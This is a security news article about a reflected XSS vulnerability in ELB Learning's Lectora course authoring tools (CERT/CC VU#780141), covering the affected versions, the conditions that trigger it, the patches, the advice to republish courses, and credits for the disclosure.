Lectora Desktop & Online Vulnerable to Reflected XSS via Crafted URL Parameters

A newly disclosed cross-site scripting (XSS) flaw in ELB Learning’s Lectora course authoring platform enables attackers to inject malicious JavaScript through specially crafted URL parameters.

The vulnerability affects Lectora Desktop (Inspire and Publisher editions) versions 21.0 through 21.3 and Lectora Online versions 7.1.6 and older, potentially exposing high-value clients such as government agencies and large enterprises to session hijacking or user redirection exploits.

The CERT Coordination Center (CERT/CC) has issued Vulnerability Note VU#780141 to raise awareness and emphasize necessary remediation steps.

Vulnerability Details and Impact

Lectora, a widely adopted e-learning development tool, offers both desktop and cloud editions for creating interactive training courses.

When courses are published with Seamless Play Publish (SPP) enabled and Web Accessibility settings disabled, unescaped user input in URL parameters can be exploited to inject JavaScript.

In practice, an attacker could lure a legitimate user into clicking a manipulated course URL, triggering client-side script execution.

This execution could display arbitrary alerts, redirect users to malicious pages, or harvest session cookies—leading to unauthorized access to the learning platform or other connected services.

Though the underlying flaw was patched in Lectora Desktop version 21.4, released October 25, 2022, republishing of existing courses was not explicitly required in the accompanying release notes.

As a result, many courses remain vulnerable despite the availability of the patch.

Lectora Online users received the fix automatically on July 20, 2025, in version 7.1.7; however, the need to republish existing courses was clearly documented only in the online release notes.

Mitigation and Remediation Steps

To fully remediate the XSS vulnerability, ELB Learning advises all Lectora Desktop customers to download version 21.4 or later from the ELB Learning portal and republish any courses created with earlier software versions.

Failure to republish leaves the vulnerable JavaScript code intact in the course output, undermining the patch.

Lectora Online administrators should ensure that any content published before the July 20, 2025, automatic update is republished using the updated backend to incorporate the fix.

Course authors should also verify that Web Accessibility options are enabled when feasible, as disabling this setting contributes to the vulnerability conditions.

Where accessibility features conflict with course design requirements, authors must exercise caution and thoroughly test published content for script injection vectors.

Coordinated Disclosure and Acknowledgements

The CERT Coordination Center published VU#780141 on September 22, 2025, to amplify awareness given the platform’s use among sensitive organizations.

The vulnerability was responsibly reported by security researcher Mohammad Jassim and documented by Laurie Tyzenhaus of CERT/CC.

ELB Learning’s public statement acknowledges the limited scope of the issue and reinforces the requirement to republish courses after applying patches, emphasizing the company’s commitment to secure authoring workflows.

Organizations using Lectora are urged to treat this notice as high priority, complete the republishing process without delay, and audit existing course inventories for compliance.

Ensuring that all training materials incorporate the patched code will safeguard users against potential XSS-driven compromises and preserve the integrity of e-learning environments.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates